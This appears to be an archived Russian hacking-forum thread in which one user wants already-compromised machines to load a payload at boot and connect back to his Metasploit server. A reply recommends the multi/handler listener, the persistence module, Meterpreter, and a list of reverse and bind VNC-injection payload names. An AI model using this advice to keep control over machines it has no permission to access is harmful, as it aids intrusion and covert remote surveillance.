PDA

Просмотр полной версии : Как использовать много сессий metasploit?


Triton
24.12.2018, 08:46
Привет! Есть ли возможность у Metasploit, держать сразу, допустим 20 сессий полезной нагрузки?
Имеется:
Есть 2 локалки с ~10 уязвимыми машинами. К ним уже есть шелы и я могу запускать на них все угодно. Не хочу использовать какой либо RAT, хочется имеенно метасплойта - так сказать практики на нем.
Есть VPS сервак с Linux - установить на него MSF дело 4 минут.

Требуется, чтобы машины при запуске загружали payload и конектились к MSF. Т.е. сгенерировать EXE с полезной нагрузкой.

Какую payload использовать? meterpreter? Он умеет из cmd переключатся на показ экрана?

Demi
25.12.2018, 23:14
В принципе было все понятно до этой строчки ...
1. Да может держать и больше сессий чем 20 ( exploit/multi/handler )
2. Можешь использовать постэксплуатациюнный модуль persistence
3. Можешь использовать Meterpreter
4. Про экран не со всем понял, полноценного управления не получишь


Triton сказал(а):

Какую payload использовать? meterpreter? Он умеет из cmd переключатся на показ экрана?

Triton
26.12.2018, 19:38
Demi сказал(а):

В принципе было все понятно до этой строчки ...
1. Да может держать и больше сессий чем 20 ( exploit/multi/handler )
2. Можешь использовать постэксплуатациюнный модуль persistence
3. Можешь использовать Meterpreter
4. Про экран не со всем понял, полноценного управления не получишь


Помнится, что в была какая то полезная нагрузка, которая запускала VNC сервер на атакуемом хосте, а ты к нему подключался. Но у меня почету то не получалось делать это не выходя из ссесии и не меняя полезную нагрузку.

Demi
26.12.2018, 23:55
Triton сказал(а):

Помнится, что в была какая то полезная нагрузка, которая запускала VNC сервер на атакуемом хосте, а ты к нему подключался. Но у меня почету то не получалось делать это не выходя из ссесии и не меняя полезную нагрузку.


Я не юзал, но можешь попробовать сделать payload

Код:



set payload windows/vncinject/bind_hidden_ipknock_tcp set payload windows/vncinject/reverse_ipv6_tcp
set payload windows/vncinject/bind_hidden_tcp set payload windows/vncinject/reverse_nonx_tcp
set payload windows/vncinject/bind_ipv6_tcp set payload windows/vncinject/reverse_ord_tcp
set payload windows/vncinject/bind_ipv6_tcp_uuid set payload windows/vncinject/reverse_tcp
set payload windows/vncinject/bind_named_pipe set payload windows/vncinject/reverse_tcp_allports
set payload windows/vncinject/bind_nonx_tcp set payload windows/vncinject/reverse_tcp_dns
set payload windows/vncinject/bind_tcp set payload windows/vncinject/reverse_tcp_rc4
set payload windows/vncinject/bind_tcp_rc4 set payload windows/vncinject/reverse_tcp_rc4_dns
set payload windows/vncinject/bind_tcp_uuid set payload windows/vncinject/reverse_tcp_uuid
set payload windows/vncinject/reverse_hop_http set payload windows/vncinject/reverse_udp
set payload windows/vncinject/reverse_http set payload windows/vncinject/reverse_winhttp
set payload windows/vncinject/reverse_http_proxy_pstore